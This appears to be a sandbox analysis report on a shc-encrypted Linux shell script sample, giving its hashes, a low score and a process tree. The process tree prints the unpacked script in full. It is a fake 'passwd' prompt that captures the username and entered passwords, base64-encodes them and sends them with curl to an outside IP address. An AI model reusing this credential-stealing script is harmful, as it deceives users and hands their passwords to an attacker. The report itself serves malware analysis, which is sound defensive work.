Analysis

  • max time kernel
    0s
  • max time network
    131s
  • platform
    ubuntu-22.04_amd64
  • resource
    ubuntu2204-amd64-20240729-en
  • resource tags

    arch:amd64, arch:i386, image:ubuntu2204-amd64-20240729-en, kernel:5.15.0-105-generic, locale:en-us, os:ubuntu-22.04-amd64, system
  • submitted
    26-11-2024 12:41

General

  • Target

    样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973

  • Size

    990KB

  • MD5

    cdafefedb4709959b4260435dc6f5973

  • SHA1

    9c54fa7b42fb4f25e6dbc995741661cee1bd8141

  • SHA256

    cb7d520296116df898c01bb9e94c05efcaa38dffb14354f42b62262c5b147e34

  • SHA512

    391bf2745abbac6ccd8eee0c7e3ea62daec185ac997d8a8cb0c918c733defdc701ff0ba44d727a3619a9be0e2070e0e34e8ceb2e1cceca889cb0f94b92c2e404

  • SSDEEP

    24576:bNAp09HLyf/Jck/sGjeXFAGqkkdagwGKLUU:bip0Byf/Jck/sGjYBlEwGK

Score
1/10

Malware Config

Signatures

(No signatures triggered. The process tree below nonetheless shows the unpacked script prompting for a password with `read -sp`, base64-encoding the username and entered passwords, and sending the result with `curl -s` to http://45.10.20.100:1010/pass — see the `/bin/bash -c` and `/usr/bin/curl` entries — so the 1/10 score should not be read as a benign verdict.)

Processes

  • /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973
    /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973
    1⤵
      PID:1564
    • /bin/bash
      /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973 -c "exec '/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973' \"\$@\"" /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973
      1⤵
        PID:1564
      • /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973
        /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973
        1⤵
          PID:1564
        • /bin/bash
          /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973 -c " #!/bin/bash if [ \"\$1\" = \"pollo\" ]; then echo 'pollo 👍' exit fi username=\$(whoami) if [ \"\$username\" = \"root\" ]; then if [ \"\$#\" -ne \"0\" ]; then echo 'Changing password for user '\$1. else echo 'Changing password for user root.' fi sleep 0.1 read -sp 'New password:' passvar1 sleep 0.1 echo -e read -sp 'Retype new password:' passvar2 pass=\$(echo \$username \$passvar1 \$passvar2 | base64) curl -s http://45.10.20.100:1010/pass?pass=\$pass &> /dev/null || cd1 -s http://45.10.20.100:1010/pass?pass=\$pass &> /dev/null if [ \"\$passvar1\" != \"\$passvar2\" ]; then echo -e echo 'Sorry, passwords do not match.' echo 'passwd: Have exhausted maximum number of retries for service' sleep 0.2 else echo -e echo 'passwd: all authentication tokens updated successfully.' sleep 0.2 fi else echo 'Changing password for user '\$username. read -sp '(current) UNIX password:' passvar0 echo -e read -sp 'New password:' passvar1 sleep 0.1 echo -e read -sp 'Retype new password:' passvar2 pass=\$(echo \$username \$passvar0 \$passvar1 \$passvar2 | base64) curl -s http://45.10.20.100:1010/pass?pass=\$pass &> /dev/null || cd1 -s http://45.10.20.100:1010/pass?pass=\$pass &> /dev/null if [ \"\$passvar1\" != \"\$passvar2\" ]; then echo -e echo 'Sorry, passwords do not match.' echo 'passwd: Have exhausted maximum number of retries for service' sleep 0.2 else echo -e echo 'passwd: all authentication tokens updated successfully.' sleep 0.2 fi fi " /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973
          1⤵
            PID:1564
            • /usr/bin/whoami
              whoami
              2⤵
                PID:1565
              • /usr/bin/sleep
                sleep 0.1
                2⤵
                  PID:1566
                • /usr/bin/sleep
                  sleep 0.1
                  2⤵
                    PID:1567
                  • /usr/bin/base64
                    base64
                    2⤵
                      PID:1570
                    • /usr/bin/curl
                      curl -s "http://45.10.20.100:1010/pass?pass=cm9vdAo="
                      2⤵
                        PID:1571
                      • /usr/bin/sleep
                        sleep 0.2
                        2⤵
                          PID:1577

                      Network

                      MITRE ATT&CK Matrix
